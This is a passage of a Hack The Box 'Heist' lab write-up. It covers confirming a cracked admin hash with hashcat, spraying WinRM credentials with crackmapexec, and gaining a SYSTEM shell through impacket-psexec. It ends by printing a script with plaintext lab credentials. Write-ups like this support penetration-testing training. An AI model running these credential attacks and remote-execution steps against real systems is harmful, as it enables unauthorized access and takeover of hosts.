admin user
I got the password hash for the admin user earlier.
it was a trickly case where i didn’t have access to a directory but did so to a file that was in it; c:\inetpub\wwwroot\login.php
Hashcat was unable to crack the hash.
I will provide the admin user’s password to against it to validate the password.
┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ hashcat -a 0 -m 1400 hashes/admin@support.htb.hash passwd
hashcat (v6.2.6) starting
hashes: 1 digests; 1 unique digests, 1 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
dictionary cache built:
* filename..: passwd
* passwords.: 4
* bytes.....: 62
* keyspace..: 4
* runtime...: 0 secs
Approaching final keyspace - workload adjusted.
91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040:4dD!5}x/re8]FBuZ
session..........: hashcat
status...........: Cracked
hash.mode........: 1400 (SHA2-256)
hash.target......: 91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337a...db9040
time.started.....: Wed Jan 11 13:32:34 2023 (0 secs)
time.estimated...: Wed Jan 11 13:32:34 2023 (0 secs)
kernel.feature...: Pure Kernel
guess.base.......: File (passwd)
guess.queue......: 1/1 (100.00%)
speed.#1.........: 88 H/s (0.01ms) @ Accel:256 Loops:1 Thr:1 Vec:8
recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
progress.........: 4/4 (100.00%)
rejected.........: 0/4 (0.00%)
restore.point....: 0/4 (0.00%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
candidate.engine.: Device Generator
candidates.#1....: stealth1agent -> 4dD!5}x/re8]FBuZ
hardware.mon.#1..: Util: 36%
started: Wed Jan 11 13:32:08 2023
stopped: Wed Jan 11 13:32:36 2023
They matched This means the credential is VALID for the web app
Logged in as admin@support.htb
but nothing there..
┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ crackmapexec winrm $IP -u users -p passwd
smb 10.10.10.149 5985 none [*] none (name:10.10.10.149) (domain:None)
http 10.10.10.149 5985 none [*] http://10.10.10.149:5985/wsman
winrm 10.10.10.149 5985 none [-] none\administrator:stealth1agent
winrm 10.10.10.149 5985 none [-] none\administrator:$uperP@ssword
winrm 10.10.10.149 5985 none [-] none\administrator:Q4)sJu\Y8qz*A3?d
winrm 10.10.10.149 5985 none [+] none\administrator:4dD!5}x/re8]FBuZ (Pwn3d!)The admin user, turned out to be the administrator user.
impacket-psexec
┌──(kali㉿kali)-[~/archive/htb/labs/heist]
└─$ impacket-psexec 'administrator@$IP' -target-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.149.....
[*] Found writable share ADMIN$
[*] Uploading file zzudbplJ.exe
[*] Opening SVCManager on 10.10.10.149.....
[*] Creating service gVFc on 10.10.10.149.....
[*] Starting service gVFc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
SupportDesk
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::43
IPv6 Address. . . . . . . . . . . : dead:beef::80d2:db11:1674:be5e
Link-local IPv6 Address . . . . . : fe80::80d2:db11:1674:be5e%15
IPv4 Address. . . . . . . . . . . : 10.10.10.149
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%15
10.10.10.2System Level Compromise
Beyond
c:\Users\Administrator\Documents> dir
Volume in drive C has no label.
Volume Serial Number is FA65-CD36
directory of c:\Users\Administrator\Documents
04/22/2019 08:13 AM <DIR> .
04/22/2019 08:13 AM <DIR> ..
04/22/2019 08:24 AM 343 chase.ps1
1 File(s) 343 bytes
2 Dir(s) 3,458,072,576 bytes free
c:\Users\Administrator\Documents> type chase.ps1
$u = 'supportdesk\chase'
$p = convertto-securestring 'Q4)sJu\Y8qz*A3?d' -asplain -force
$c = new-object system.management.automation.pscredential($u, $p)
start-process 'c:\Program Files\Mozilla Firefox\firefox.exe' -Credential $c -ArgumentList 'localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login='This must have been the script that was running in the background